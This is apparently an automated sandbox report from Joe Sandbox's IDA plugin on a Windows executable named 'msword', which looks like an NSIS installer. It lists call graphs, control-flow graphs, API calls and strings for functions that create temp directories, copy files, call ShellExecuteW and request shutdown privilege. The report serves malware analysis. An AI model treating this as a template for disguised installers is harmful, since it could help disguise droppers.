40209f GetDlgItem GetClientRect 5013 40145c 18 API calls 5012->5013 5014 4020cf LoadImageW SendMessageW 5013->5014 5015 4030e3 5014->5015 5016 4020ed DeleteObject 5014->5016 5016->5015 5017 402b9f 5018 401446 18 API calls 5017->5018 5023 402ba7 5018->5023 5019 402c4a 5020 402bdf ReadFile 5022 402c3d 5020->5022 5020->5023 5021 401446 18 API calls 5021->5022 5022->5019 5022->5021 5029 402d17 ReadFile 5022->5029 5023->5019 5023->5020 5023->5022 5024 402c06 MultiByteToWideChar 5023->5024 5025 402c3f 5023->5025 5027 402c4f 5023->5027 5024->5023 5024->5027 5030 405f51 wsprintfW 5025->5030 5027->5022 5028 402c6b SetFilePointer 5027->5028 5028->5022 5029->5022 5030->5019 5031 402b23 GlobalAlloc 5032 402b39 5031->5032 5033 402b4b 5031->5033 5034 401446 18 API calls 5032->5034 5035 40145c 18 API calls 5033->5035 5036 402b41 5034->5036 5037 402b52 WideCharToMultiByte lstrlenA 5035->5037 5038 402b93 5036->5038 5039 402b84 WriteFile 5036->5039 5037->5036 5039->5038 5040 402384 GlobalFree 5039->5040 5040->5038 5042 4044a5 5043 404512 5042->5043 5044 4044df 5042->5044 5046 40451f GetDlgItem GetAsyncKeyState 5043->5046 5053 4045b1 5043->5053 5110 405c84 GetDlgItemTextW 5044->5110 5049 40453e GetDlgItem 5046->5049 5056 40455c 5046->5056 5047 4044ea 5050 406038 5 API calls 5047->5050 5048 40469d 5108 404833 5048->5108 5112 405c84 GetDlgItemTextW 5048->5112 5051 403d3f 19 API calls 5049->5051 5052 4044f0 5050->5052 5055 404551 ShowWindow 5051->5055 5058 403e74 5 API calls 5052->5058 5053->5048 5059 406805 18 API calls 5053->5059 5053->5108 5055->5056 5061 404579 SetWindowTextW 5056->5061 5066 405d59 4 API calls 5056->5066 5057 403dca 8 API calls 5062 404847 5057->5062 5063 4044f5 GetDlgItem 5058->5063 5064 40462f SHBrowseForFolderW 5059->5064 5060 4046c9 5065 40677e 18 API calls 5060->5065 5067 403d3f 19 API calls 5061->5067 5068 404503 IsDlgButtonChecked 5063->5068 5063->5108 5064->5048 5069 404647 CoTaskMemFree 5064->5069 5070 4046cf 5065->5070 5071 40456f 5066->5071 5072 404597 5067->5072 5068->5043 5073 406722 3 API calls 5069->5073 5113 406009 lstrcpynW 5070->5113 5071->5061 5077 406722 3 API calls 5071->5077 5074 403d3f 19 API calls 5072->5074 5075 404654 5073->5075 5078 4045a2 5074->5078 5079 40468b SetDlgItemTextW 5075->5079 5084 406805 18 API calls 5075->5084 5077->5061 5111 403d98 SendMessageW 5078->5111 5079->5048 5080 4046e6 5082 4062fc 3 API calls 5080->5082 5091 4046ee 5082->5091 5083 4045aa 5087 4062fc 3 API calls 5083->5087 5085 404673 lstrcmpiW 5084->5085 5085->5079 5088 404684 lstrcatW 5085->5088 5086 404730 5114 406009 lstrcpynW 5086->5114 5087->5053 5088->5079 5090 404739 5092 405d59 4 API calls 5090->5092 5091->5086 5096 406751 2 API calls 5091->5096 5097 404785 5091->5097 5093 40473f GetDiskFreeSpaceW 5092->5093 5095 404763 MulDiv 5093->5095 5093->5097 5095->5097 5096->5091 5099 4047e2 5097->5099 5100 4043ad 21 API calls 5097->5100 5098 404805 5115 403d85 KiUserCallbackDispatcher 5098->5115 5099->5098 5101 40141d 80 API calls 5099->5101 5102 4047d3 5100->5102 5101->5098 5104 4047e4 SetDlgItemTextW 5102->5104 5105 4047d8 5102->5105 5104->5099 5106 4043ad 21 API calls 5105->5106 5106->5099 5107 404821 5107->5108 5116 403d61 5107->5116 5108->5057 5110->5047 5111->5083 5112->5060 5113->5080 5114->5090 5115->5107 5117 403d74 SendMessageW 5116->5117 5118 403d6f 5116->5118 5117->5108 5118->5117 5119 402da5 5120 4030e3 5119->5120 5121 402dac 5119->5121 5122 401446 18 API calls 5121->5122 5123 402db8 5122->5123 5124 402dbf SetFilePointer 5123->5124 5124->5120 5125 402dcf 5124->5125 5125->5120 5127 405f51 wsprintfW 5125->5127 5127->5120 5128 4030a9 SendMessageW 5129 4030c2 InvalidateRect 5128->5129 5130 4030e3 5128->5130 5129->5130 5131 401cb2 5132 40145c 18 API calls 5131->5132 5133 401c54 5132->5133 5134 4062a3 11 API calls 5133->5134 5137 401c64 5133->5137 5135 401c59 5134->5135 5136 406c9b 81 API calls 5135->5136 5136->5137 4087 4021b5 4088 40145c 18 API calls 4087->4088 4089 4021bb 4088->4089 4090 40145c 18 API calls 4089->4090 4091 4021c4 4090->4091 4092 40145c 18 API calls 4091->4092 4093 4021cd 4092->4093 4094 40145c 18 API calls 4093->4094 4095 4021d6 4094->4095 4096 404f72 25 API calls 4095->4096 4097 4021e2 ShellExecuteW 4096->4097 4098 40221b 4097->4098 4099 40220d 4097->4099 4101 4062a3 11 API calls 4098->4101 4100 4062a3 11 API calls 4099->4100 4100->4098 4102 402230 4101->4102 5145 402238 5146 40145c 18 API calls 5145->5146 5147 40223e 5146->5147 5148 4062a3 11 API calls 5147->5148 5149 40224b 5148->5149 5150 404f72 25 API calls 5149->5150 5151 402255 5150->5151 5152 405c3f 2 API calls 5151->5152 5153 40225b 5152->5153 5154 4062a3 11 API calls 5153->5154 5157 4022ac CloseHandle 5153->5157 5160 40226d 5154->5160 5156 4030e3 5157->5156 5158 402283 WaitForSingleObject 5159 402291 GetExitCodeProcess 5158->5159 5158->5160 5159->5157 5162 4022a3 5159->5162 5160->5157 5160->5158 5161 406332 2 API calls 5160->5161 5161->5158 5164 405f51 wsprintfW 5162->5164 5164->5157 5165 4040b8 5166 4040d3 5165->5166 5174 404201 5165->5174 5170 40410e 5166->5170 5196 403fca WideCharToMultiByte 5166->5196 5167 40426c 5168 404276 GetDlgItem 5167->5168 5169 40433e 5167->5169 5171 404290 5168->5171 5172 4042ff 5168->5172 5175 403dca 8 API calls 5169->5175 5177 403d3f 19 API calls 5170->5177 5171->5172 5180 4042b6 6 API calls 5171->5180 5172->5169 5181 404311 5172->5181 5174->5167 5174->5169 5176 40423b GetDlgItem SendMessageW 5174->5176 5179 404339 5175->5179 5201 403d85 KiUserCallbackDispatcher 5176->5201 5178 40414e 5177->5178 5183 403d3f 19 API calls 5178->5183 5180->5172 5184 404327 5181->5184 5185 404317 SendMessageW 5181->5185 5188 40415b CheckDlgButton 5183->5188 5184->5179 5189 40432d SendMessageW 5184->5189 5185->5184 5186 404267 5187 403d61 SendMessageW 5186->5187 5187->5167 5199 403d85 KiUserCallbackDispatcher 5188->5199 5189->5179 5191 404179 GetDlgItem 5200 403d98 SendMessageW 5191->5200 5193 40418f SendMessageW 5194 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5193->5194 5195 4041ac GetSysColor 5193->5195 5194->5179 5195->5194 5197 404007 5196->5197 5198 403fe9 GlobalAlloc WideCharToMultiByte 5196->5198 5197->5170 5198->5197 5199->5191 5200->5193 5201->5186 4196 401eb9 4197 401f24 4196->4197 4198 401ec6 4196->4198 4199 401f53 GlobalAlloc 4197->4199 4200 401f28 4197->4200 4201 401ed5 4198->4201 4208 401ef7 4198->4208 4202 406805 18 API calls 4199->4202 4207 4062a3 11 API calls 4200->4207 4212 401f36 4200->4212 4203 4062a3 11 API calls 4201->4203 4206 401f46 4202->4206 4204 401ee2 4203->4204 4209 402708 4204->4209 4214 406805 18 API calls 4204->4214 4206->4209 4210 402387 GlobalFree 4206->4210 4207->4212 4218 406009 lstrcpynW 4208->4218 4210->4209 4220 406009 lstrcpynW 4212->4220 4213 401f06 4219 406009 lstrcpynW 4213->4219 4214->4204 4216 401f15 4221 406009 lstrcpynW 4216->4221 4218->4213 4219->4216 4220->4206 4221->4209 5202 4074bb 5204 407344 5202->5204 5203 407c6d 5204->5203 5205 4073c2 GlobalFree 5204->5205 5206 4073cb GlobalAlloc 5204->5206 5207 407443 GlobalAlloc 5204->5207 5208 40743a GlobalFree 5204->5208 5205->5206 5206->5203 5206->5204 5207->5203 5207->5204 5208->5207

                                                                            Executed Functions

                                                                            Function 004050CD Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 295windowclipboardmemoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 0 4050cd-4050e8 1 405295-40529c 0->1 2 4050ee-4051d5 GetDlgItem * 3 call 403d98 call 404476 call 406805 call 4062a3 GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052c6-4052d3 1->3 4 40529e-4052c0 GetDlgItem CreateThread CloseHandle 1->4 35 4051f3-4051f6 2->35 36 4051d7-4051f1 SendMessageW * 2 2->36 6 4052f4-4052fb 3->6 7 4052d5-4052de 3->7 4->3 11 405352-405356 6->11 12 4052fd-405303 6->12 9 4052e0-4052ef ShowWindow * 2 call 403d98 7->9 10 405316-40531f call 403dca 7->10 9->6 22 405324-405328 10->22 11->10 14 405358-40535b 11->14 16 405305-405311 call 403d18 12->16 17 40532b-40533b ShowWindow 12->17 14->10 20 40535d-405370 SendMessageW 14->20 16->10 23 40534b-40534d call 403d18 17->23 24 40533d-405346 call 404f72 17->24 27 405376-405397 CreatePopupMenu call 406805 AppendMenuW 20->27 28 40528e-405290 20->28 23->11 24->23 37 405399-4053aa GetWindowRect 27->37 38 4053ac-4053b2 27->38 28->22 39 405206-40521d call 403d3f 35->39 40 4051f8-405204 SendMessageW 35->40 36->35 41 4053b3-4053cb TrackPopupMenu 37->41 38->41 46 405253-405274 GetDlgItem SendMessageW 39->46 47 40521f-405233 ShowWindow 39->47 40->39 41->28 43 4053d1-4053e8 41->43 45 4053ed-405408 SendMessageW 43->45 45->45 48 40540a-40542d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 46->28 51 405276-40528c SendMessageW * 2 46->51 49 405242 47->49 50 405235-405240 ShowWindow 47->50 52 40542f-405458 SendMessageW 48->52 53 405248-40524e call 403d98 49->53 50->53 51->28 52->52 54 40545a-405474 GlobalUnlock SetClipboardData CloseClipboard 52->54 53->46 54->28
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                                                            • GetClientRect.USER32(?,?), ref: 00405196
                                                                            • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                                                            • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                                                            • ShowWindow.USER32(?,00000008), ref: 0040523A
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                                                            • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                                                              • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                              • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                              • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                              • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                                                            • CloseHandle.KERNELBASE(00000000), ref: 004052C0
                                                                            • ShowWindow.USER32(00000000), ref: 004052E7
                                                                            • ShowWindow.USER32(?,00000008), ref: 004052EC
                                                                            • ShowWindow.USER32(00000008), ref: 00405333
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                                                            • CreatePopupMenu.USER32 ref: 00405376
                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                                                            • GetWindowRect.USER32(?,?), ref: 0040539E
                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                                                            • OpenClipboard.USER32(00000000), ref: 0040540B
                                                                            • EmptyClipboard.USER32 ref: 00405411
                                                                            • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                                                            • GlobalLock.KERNEL32(00000000), ref: 00405427
                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0040545D
                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                                                            • CloseClipboard.USER32 ref: 0040546E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                            • String ID: @rD$New install of "%s" to "%s"${
                                                                            • API String ID: 2110491804-2409696222
                                                                            • Opcode ID: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                                            • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                                                            • Opcode Fuzzy Hash: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                                            • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59
                                                                            Function 00403883 Relevance: 54.6, APIs: 22, Strings: 9, Instructions: 304filestringcomCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 305 403883-403919 #17 SetErrorMode OleInitialize call 4062fc SHGetFileInfoW call 406009 GetCommandLineW call 406009 GetModuleHandleW 312 403923-403937 call 405d06 CharNextW 305->312 313 40391b-40391e 305->313 316 4039ca-4039d0 312->316 313->312 317 4039d6 316->317 318 40393c-403942 316->318 319 4039f5-403a0d GetTempPathW call 4037cc 317->319 320 403944-40394a 318->320 321 40394c-403950 318->321 328 403a33-403a4d DeleteFileW call 403587 319->328 329 403a0f-403a2d GetWindowsDirectoryW lstrcatW call 4037cc 319->329 320->320 320->321 323 403952-403957 321->323 324 403958-40395c 321->324 323->324 326 4039b8-4039c5 call 405d06 324->326 327 40395e-403965 324->327 326->316 342 4039c7 326->342 331 403967-40396e 327->331 332 40397a-40398c call 403800 327->332 345 403acc-403adb call 403859 CoUninitialize 328->345 346 403a4f-403a55 328->346 329->328 329->345 333 403970-403973 331->333 334 403975 331->334 343 4039a1-4039b6 call 403800 332->343 344 40398e-403995 332->344 333->332 333->334 334->332 342->316 343->326 361 4039d8-4039f0 call 407d6e call 406009 343->361 348 403997-40399a 344->348 349 40399c 344->349 359 403ae1-403af1 call 405ca0 ExitProcess 345->359 360 403bce-403bd4 345->360 351 403ab5-403abc call 40592c 346->351 352 403a57-403a60 call 405d06 346->352 348->343 348->349 349->343 358 403ac1-403ac7 call 4060e7 351->358 362 403a79-403a7b 352->362 358->345 365 403c51-403c59 360->365 366 403bd6-403bf3 call 4062fc * 3 360->366 361->319 370 403a62-403a74 call 403800 362->370 371 403a7d-403a87 362->371 372 403c5b 365->372 373 403c5f 365->373 397 403bf5-403bf7 366->397 398 403c3d-403c48 ExitWindowsEx 366->398 370->371 384 403a76 370->384 378 403af7-403b11 lstrcatW lstrcmpiW 371->378 379 403a89-403a99 call 40677e 371->379 372->373 378->345 383 403b13-403b29 CreateDirectoryW SetCurrentDirectoryW 378->383 379->345 390 403a9b-403ab1 call 406009 * 2 379->390 387 403b36-403b56 call 406009 * 2 383->387 388 403b2b-403b31 call 406009 383->388 384->362 404 403b5b-403b77 call 406805 DeleteFileW 387->404 388->387 390->351 397->398 402 403bf9-403bfb 397->402 398->365 401 403c4a-403c4c call 40141d 398->401 401->365 402->398 406 403bfd-403c0f GetCurrentProcess 402->406 412 403bb8-403bc0 404->412 413 403b79-403b89 CopyFileW 404->413 406->398 411 403c11-403c33 406->411 411->398 412->404 414 403bc2-403bc9 call 406c68 412->414 413->412 415 403b8b-403bab call 406c68 call 406805 call 405c3f 413->415 414->345 415->412 425 403bad-403bb4 CloseHandle 415->425 425->412
                                                                            APIs
                                                                            • #17.COMCTL32 ref: 004038A2
                                                                            • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                                                            • OleInitialize.OLE32(00000000), ref: 004038B4
                                                                              • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                              • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                              • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                            • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                                                              • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                            • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                                                            • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                                                            • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                                                            • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                                                            • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                                                            • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                                                            • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                                                            • CoUninitialize.COMBASE(?), ref: 00403AD1
                                                                            • ExitProcess.KERNEL32 ref: 00403AF1
                                                                            • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                                                            • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                                                            • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                                                            • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                                                            • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                                                            • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                                                            • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                                                            • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                            • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                                                            • API String ID: 2435955865-239407132
                                                                            • Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                                            • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                                                            • Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                                            • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E
                                                                            Function 004074BB Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 820 4074bb-4074c0 821 4074c2-4074ef 820->821 822 40752f-407547 820->822 824 4074f1-4074f4 821->824 825 4074f6-4074fa 821->825 823 407aeb-407aff 822->823 829 407b01-407b17 823->829 830 407b19-407b2c 823->830 826 407506-407509 824->826 827 407502 825->827 828 4074fc-407500 825->828 831 407527-40752a 826->831 832 40750b-407514 826->832 827->826 828->826 833 407b33-407b3a 829->833 830->833 836 4076f6-407713 831->836 837 407516 832->837 838 407519-407525 832->838 834 407b61-407c68 833->834 835 407b3c-407b40 833->835 851 407350 834->851 852 407cec 834->852 840 407b46-407b5e 835->840 841 407ccd-407cd4 835->841 843 407715-407729 836->843 844 40772b-40773e 836->844 837->838 839 407589-4075b6 838->839 847 4075d2-4075ec 839->847 848 4075b8-4075d0 839->848 840->834 845 407cdd-407cea 841->845 849 407741-40774b 843->849 844->849 850 407cef-407cf6 845->850 853 4075f0-4075fa 847->853 848->853 854 40774d 849->854 855 4076ee-4076f4 849->855 856 407357-40735b 851->856 857 40749b-4074b6 851->857 858 40746d-407471 851->858 859 4073ff-407403 851->859 852->850 862 407600 853->862 863 407571-407577 853->863 864 407845-4078a1 854->864 865 4076c9-4076cd 854->865 855->836 861 407692-40769c 855->861 856->845 866 407361-40736e 856->866 857->823 871 407c76-407c7d 858->871 872 407477-40748b 858->872 877 407409-407420 859->877 878 407c6d-407c74 859->878 867 4076a2-4076c4 861->867 868 407c9a-407ca1 861->868 880 407556-40756e 862->880 881 407c7f-407c86 862->881 869 40762a-407630 863->869 870 40757d-407583 863->870 864->823 873 407c91-407c98 865->873 874 4076d3-4076eb 865->874 866->852 882 407374-4073ba 866->882 867->864 868->845 883 40768e 869->883 884 407632-40764f 869->884 870->839 870->883 871->845 879 40748e-407496 872->879 873->845 874->855 885 407423-407427 877->885 878->845 879->858 889 407498 879->889 880->863 881->845 887 4073e2-4073e4 882->887 888 4073bc-4073c0 882->888 883->861 890 407651-407665 884->890 891 407667-40767a 884->891 885->859 886 407429-40742f 885->886 893 407431-407438 886->893 894 407459-40746b 886->894 897 4073f5-4073fd 887->897 898 4073e6-4073f3 887->898 895 4073c2-4073c5 GlobalFree 888->895 896 4073cb-4073d9 GlobalAlloc 888->896 889->857 892 40767d-407687 890->892 891->892 892->869 899 407689 892->899 900 407443-407453 GlobalAlloc 893->900 901 40743a-40743d GlobalFree 893->901 894->879 895->896 896->852 902 4073df 896->902 897->885 898->897 898->898 904 407c88-407c8f 899->904 905 40760f-407627 899->905 900->852 900->894 901->900 902->887 904->845 905->869
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                            • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                                                            • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                            • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                                                            Function 004062FC Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                            • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleLibraryLoadModuleProc
                                                                            • String ID:
                                                                            • API String ID: 310444273-0
                                                                            • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                            • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                                                            • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                            • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                                                            Function 004062D5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                            • FindClose.KERNEL32(00000000), ref: 004062EC
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: Find$CloseFileFirst
                                                                            • String ID:
                                                                            • API String ID: 2295610775-0
